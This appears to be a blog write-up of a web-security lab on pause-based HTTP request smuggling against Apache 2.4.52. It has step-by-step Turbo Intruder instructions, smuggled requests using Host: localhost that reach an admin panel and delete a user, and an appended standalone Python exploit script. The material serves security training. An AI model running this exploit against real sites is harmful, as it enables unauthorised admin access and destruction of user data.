Pause Desync Attack:

Pause-based desync attack: getting past the 403 Forbidden and into the admin panel

This attack is a form of HTTP request smuggling.

Hey lovely people, it's KRiPPto99 back again with another blog, and today we are going to learn about an attack that is part of HTTP request smuggling.

Let's suppose there are two servers, a front-end and a back-end. Every request we send goes through the front-end to the back-end; when the back-end receives the request it sends its response back to the front-end, which completes the cycle and ends the request.

In this flavour of request smuggling we put a GET request inside the body of a POST request and try to fool the servers, but we send the request in two halves: first only the headers, not the body. The front-end forwards the headers to the back-end, and the back-end waits for the body. Servers always have a read timeout; once it expires, a vulnerable back-end (here Apache 2.4.52 handling a server-level redirect) responds to the front-end as if the request were complete, without closing the connection. Now we send the second half, the GET request. The front-end forwards it on the same connection, the back-end treats it as a brand-new request and sends a response for it to the front-end as well, so one request from us produces two responses, the second of which belongs to the smuggled GET.

 

Let's try it in practice in this lab.

step1: Log in, capture the request and send it to Repeater. The lab's back-end is Apache 2.4.52, which is vulnerable to a pause-based CL.0 attack on endpoints that trigger server-level redirects.

step2: Change the path to /resources and send the request. Notice that it redirects to /resources/: this is the server-level redirect we need.

step3: Right-click the request and select Extensions > Turbo Intruder > Send to Turbo Intruder (if you don't see this option, install Turbo Intruder from the BApp Store).

step4: In Turbo Intruder, change the request to a POST request (right-click and select Change request method).

step5: Remove any extra headers, change the Connection header to keep-alive, and put the request we want to smuggle in the body, followed by a blank line:

GET /admin/ HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net

as shown in the screenshot. Then use this Turbo Intruder script:

 

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           requestsPerConnection=500,
                           pipeline=False
                           )

    # pause for 61 s after the first blank line, i.e. right after the outer headers
    engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=61000)
    engine.queue(target.req)


def handleResponse(req, interesting):
    table.add(req)

 

 

 

step6: Click Attack and wait about 61 seconds (the pauseTime we set). The first entry is the POST /resources request, which triggered a redirect to /resources/. The second entry is the smuggled GET /admin/, which the back-end answered as a separate request but with 403 Forbidden.

 

step7: Change the Host header of the smuggled GET /admin/ request to localhost, launch the attack again and wait another 61 seconds. This time the second response is the admin panel.

 

step8: Here we go. In the admin panel response, look for the CSRF token in the delete form; the next request needs it.

 

step9: Stop the attack and change the request to the following:

 

POST /resources HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Cookie: session=YOUR-SESSION-COOKIE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: CORRECT

POST /admin/delete/ HTTP/1.1
Host: localhost
Content-Type: x-www-form-urlencoded
Content-Length: CORRECT

csrf=YOUR-CSRF-TOKEN&username=carlos

Paste in the CSRF token you copied from the admin panel. Turbo Intruder corrects the outer Content-Length for you by default, but the inner one has to be the exact byte length of the csrf=...&username=carlos line, so count it yourself.

 

step10: Attack!!!!!!! Wait 61 seconds; the smuggled POST /admin/delete/ is processed with Host: localhost and deletes carlos. Congrats, the lab is solved…
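The same attack as a standalone script, written for this post as an added example rather than taken from it or from Turbo Intruder. It does with a raw TLS socket what the Turbo Intruder script above does with pauseMarker/pauseTime (send the headers, sleep past the back-end's body timeout, then send the body), and it also computes the two Content-Length values that the procedure leaves as CORRECT. The lab host, session cookie and CSRF token are placeholders, split_responses is a helper written here to count how many responses come back on one connection (two for one request is the desync signal), and the 61-second pause follows the post's pauseTime.

```python
import socket
import ssl
import time

# Placeholders, not values from the original post: fill in your own lab host,
# session cookie and CSRF token before running the __main__ section.
LAB_HOST = "YOUR-LAB-ID.web-security-academy.net"
SESSION = "YOUR-SESSION-COOKIE"
CSRF = "YOUR-CSRF-TOKEN"


def build_inner_request(method, path, host, body=b""):
    """Build the request that gets smuggled as the body of the outer POST.

    Its Content-Length must be the exact byte length of its own body; Turbo
    Intruder only corrects the outer request's Content-Length for you.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    if body:
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def build_pause_desync_request(lab_host, session, inner):
    """Return (headers, body) for the outer POST /resources request.

    The two parts are sent separately: headers first, then the body only after
    the back-end has timed out waiting for it and already answered the
    /resources -> /resources/ redirect, so the body is parsed as a new request.
    """
    headers = (
        "POST /resources HTTP/1.1\r\n"
        f"Host: {lab_host}\r\n"
        f"Cookie: session={session}\r\n"
        "Connection: keep-alive\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(inner)}\r\n"
        "\r\n"
    ).encode()
    return headers, inner


def split_responses(raw):
    """Split the bytes read back from one connection into HTTP responses.

    Only Content-Length (or empty) bodies are handled, which is all the lab
    sends back; chunked encoding is not. Getting two responses for one outer
    request is the desync signal.
    """
    responses = []
    while raw:
        sep = raw.find(b"\r\n\r\n")
        if sep == -1:
            break
        head, raw = raw[:sep], raw[sep + 4:]
        status, *header_lines = head.decode("iso-8859-1").split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", 0))
        body, raw = raw[:length], raw[length:]
        responses.append((status, headers, body))
    return responses


def send_paused(host, headers, body, pause=61, port=443):
    """Send the headers, pause past the back-end's body timeout, then send the body."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock, \
            ctx.wrap_socket(sock, server_hostname=host) as tls:
        tls.sendall(headers)
        time.sleep(pause)  # back-end gives up on the body and answers the redirect
        tls.sendall(body)  # forwarded on the same connection, parsed as a new request
        tls.settimeout(5)
        raw = b""
        try:
            while True:
                chunk = tls.recv(65536)
                if not chunk:
                    break
                raw += chunk
        except socket.timeout:
            pass
    return split_responses(raw)


if __name__ == "__main__":
    # Step 6 of the post: smuggle GET /admin/ with the lab host (expect 301 then 403).
    probe = build_inner_request("GET", "/admin/", LAB_HOST)
    for status, _, _ in send_paused(LAB_HOST, *build_pause_desync_request(LAB_HOST, SESSION, probe)):
        print(status)
    # Step 7 is the same probe with Host: localhost; the second response is then the admin panel.
    # Step 9: once you have the CSRF token from that panel, smuggle the delete.
    form = f"csrf={CSRF}&username=carlos".encode()
    delete = build_inner_request("POST", "/admin/delete/", "localhost", form)
    for status, _, _ in send_paused(LAB_HOST, *build_pause_desync_request(LAB_HOST, SESSION, delete)):
        print(status)
```

The first response printed should be the 301 for /resources, and the second whatever the back-end gave the smuggled request (403 with the lab host, the admin panel with Host: localhost); if only one response comes back, the pause was not long enough for the back-end's timeout or the endpoint does not trigger a server-level redirect.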

 

 

 

seeyaa at next time byeee!!!!!!!!!!